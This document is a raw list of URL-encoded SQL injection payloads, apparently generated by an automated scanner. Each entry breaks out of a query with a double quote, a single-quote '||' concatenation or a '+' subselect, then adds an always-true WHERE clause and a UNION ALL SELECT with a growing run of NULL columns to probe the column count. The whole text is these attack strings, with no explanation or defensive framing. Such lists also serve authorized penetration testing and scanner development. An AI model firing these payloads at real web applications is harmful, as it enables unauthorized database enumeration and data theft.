1%22%20WHERE%202086%3D2086%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%205613%3D5613%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%203159%3D3159%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%202937%3D2937%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%201390%3D1390%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%203963%3D3963%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%202471%3D2471%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%208264%3D8264%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%206231%3D6231%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20%7C%7C%20%28SELECT%204977%20FROM%20DUAL%20WHERE%204264%3D4264%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205636%20FROM%20DUAL%20WHERE%206768%3D6768%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205832%20FROM%20DUAL%20WHERE%208648%3D8648%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205648%20FROM%20DUAL%20WHERE%206140%3D6140%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201707%20FROM%20DUAL%20WHERE%206625%3D6625%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207315%20FROM%20DUAL%20WHERE%209340%3D9340%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209483%20FROM%20DUAL%20WHERE%209812%3D9812%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208811%20FROM%20DUAL%20WHERE%201027%3D1027%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206114%20FROM%20DUAL%20WHERE%209105%3D9105%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202683%20FROM%20DUAL%20WHERE%207009%3D7009%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205840%20WHERE%209387%3D9387%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203043%20WHERE%206877%3D6877%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209720%20WHERE%208701%3D8701%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207934%20WHERE%201866%3D1866%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205542%20WHERE%201161%3D1161%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206399%20WHERE%201708%3D1708%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207039%20WHERE%203090%3D3090%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204005%20WHERE%207886%3D7886%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206369%20WHERE%209338%3D9338%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204278%20WHERE%201911%3D1911%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%205894%20FROM%20DUAL%20WHERE%203684%3D3684%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%204776%20FROM%20DUAL%20WHERE%207238%3D7238%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%205388%20FROM%20DUAL%20WHERE%202769%3D2769%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%204743%20FROM%20DUAL%20WHERE%201782%3D1782%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%206667%20FROM%20DUAL%20WHERE%209685%3D9685%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%209250%20FROM%20DUAL%20WHERE%204948%3D4948%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%207133%20FROM%20DUAL%20WHERE%207420%3D7420%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%203236%20FROM%20DUAL%20WHERE%208389%3D8389%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%204226%20FROM%20DUAL%20WHERE%209005%3D9005%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%208380%20FROM%20DUAL%20WHERE%205065%3D5065%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%205931%20WHERE%207433%3D7433%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%209289%20WHERE%209009%3D9009%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%204114%20WHERE%206597%3D6597%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%203277%20WHERE%204480%3D4480%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 